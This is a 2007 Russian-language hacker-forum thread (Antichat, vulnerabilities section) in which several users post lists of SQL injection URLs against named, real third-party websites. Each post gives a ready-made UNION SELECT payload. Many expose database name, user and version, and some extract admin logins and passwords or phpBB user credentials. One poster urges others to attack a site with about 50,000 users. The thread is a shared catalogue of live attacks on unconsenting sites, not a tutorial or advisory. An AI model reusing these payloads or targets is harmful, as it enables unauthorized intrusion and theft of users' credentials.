ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #661  
Старый 02.03.2007, 21:01
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

__http://www.jorin.ru/content.php?id=-1+union+select+concat(database(),char(58),user(),c har(58),version())/*

__http://www.westauto.ru/news.php?news=yes&newsid=-1+union+select+concat(database(),char(58),user(),c har(58),version()),2,3,4/*
 
Ответить с цитированием

  #662  
Старый 02.03.2007, 23:17
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Смотрим имена таблиц:

__http://www.sportobzor.ru/index.php?id=55&page=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*

Пароль и логин админа:

__http://www.sportobzor.ru/index.php?id=55&page=-1+union+select+1,2,3,4,concat(username,char(58),pa ssword),6,7,8,9,10,11,12,13+from+admin/*
 
Ответить с цитированием

  #663  
Старый 02.03.2007, 23:23
Аватар для freddi
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

Моя первая

http://www.basketball.ru/netcat/modules/user/profile.php?userid=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7/*
 
Ответить с цитированием

  #664  
Старый 03.03.2007, 10:34
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

mail.ru
http://corp.mail.ru/press.html?mode=-1+union+select+1,2,3,4,user()/*
 
Ответить с цитированием

  #665  
Старый 03.03.2007, 16:05
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

http://www.flugzeugbilder.de/show.php?id=-588342+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20+from+mysql.user/*

http://www.cybwarrior.com/download/show.php?id=-47+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+fo rum/*

http://www.xtremepsp.com/downloads.php?cat=-2+union+select+1,2,3,4,Password,6,7,8+from+admin/*

http://www.a1k.it/downloads.php?cat=-9+union+select+1,concat(username,char(58),user_icq ,char(58),user_password),3,4,5,6,7,8,9+from+phpbb_ users+limit+1,1/*

http://www.davidyassky.com/issues.php?id=-24+union+select+1,2,3,4,5,6,7,8,9/*

http://www.cut-up.com/news/issues.php?issue=-13+union+select+1,2,3,4,VERSION()/*

http://cidoc.ics.forth.gr/issues.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.davealbo.com/issues.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.lccp.org/issues.php?ID=-6+union+select+1,2,3,4,password,6,7,8+from+users/*

http://tell-me-more.org/issues.php?ID=-21+union+select+1,2,3,4,5,6,7,8/*

http://www.ekipirovka.ru/issues.php?id=-47+union+select+1,2,3/*

http://www.cmslaw.com/current-issues.php?id=-3+union+select+1,2,3,4,5,6,7/*
 
Ответить с цитированием

  #666  
Старый 03.03.2007, 22:19
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

__http://www.runiga.com/ruso/home.php?pageid=190&id=-1+union+select+1,2,3,concat(login,char(58),email), 5,6,7,8,9+from+users/*
 
Ответить с цитированием

  #667  
Старый 03.03.2007, 22:30
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
http://www.pdma.org/news.php?ID=-189%20union%20select%201,2,3,4,5,6,7,8,9,0%20from% 20user/*
Цитата:
http://www.calmapro.com/popeye/news.php?id=38%20UNION%20SELECT%200,1,id,concat(us ername,char(58),password),4,5,6,7%20from%20users/*
Цитата:
http://www.cinecon.com/news.php?sid=-391%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,1 2,13,14/*
Цитата:
http://news.qs.kiev.ua/lenta/news.php?id=3890909397%20UNION%20SELECT%200,1,2,3, 4,5,6,7,8%20from%20mysql.user/*
Цитата:
http://tombraider.ugo.com/games/news.php?id=176%20union%20select%201,2,3,4,5,6,7,8/*
Цитата:
http://www.spoonohost.com/about/news.php?id=1%20union%20select%201,2,3,4,5/*
 
Ответить с цитированием

  #668  
Старый 04.03.2007, 11:03
Аватар для TaNkist
TaNkist
Участник форума
Регистрация: 06.04.2006
Сообщений: 257
Провел на форуме:
367179

Репутация: 76
По умолчанию

http://www.mtas.ru/second.php?ID=15%20UNION%20SELECT%20null/*

http://www.flirtanica.ru/articles1.php?id=-1%20UNION%20SELECT%201,version(),3,4,user()/*
 
Ответить с цитированием

  #669  
Старый 04.03.2007, 11:31
Аватар для valiko
valiko
Участник форума
Регистрация: 28.01.2007
Сообщений: 153
Провел на форуме:
1237085

Репутация: 452
По умолчанию

Код:
http://www.fullboost.com.au/news.php?newsId=-179%20union%20select%201,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,version(),9,10,11/*
 
Ответить с цитированием

  #670  
Старый 04.03.2007, 15:20
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.pitermag.ru/labels.php?do=ViewBrand&id=-1+union+select+1,database(),3,4,5,6,7/*
если было, сорри
Код:
http://rpg.gameforums.ru/sections.php?op=viewarticle&artid=-1+union+select+1,2,3,4,5,6,concat(uname,0x3a,pass,0x3a,email,0x3a,0x3a),8,9,10,11,12,13+from+users+limit+1,1/*
там 50к юзеров вроде как, дерзайте




upd:
Код:
http://www.bonsk.ru/seminars.php?id=-1+union+select+1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17/*
Код:
http://sibdeti.ru/adresa.php?tip=-1+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15/*
сайты взаимосвязаны.. копаться не стал, т.к. ничего явного не нашел, а пинг до сайтов большой =\

15.22pm upd2:
Код:
http://www.daoiststudies.org/scholars.php?cmd=list&userid=-1+union+select+1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18/*
копаться также не стал, убегаю

Последний раз редактировалось n1†R0x; 04.03.2007 в 16:22..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ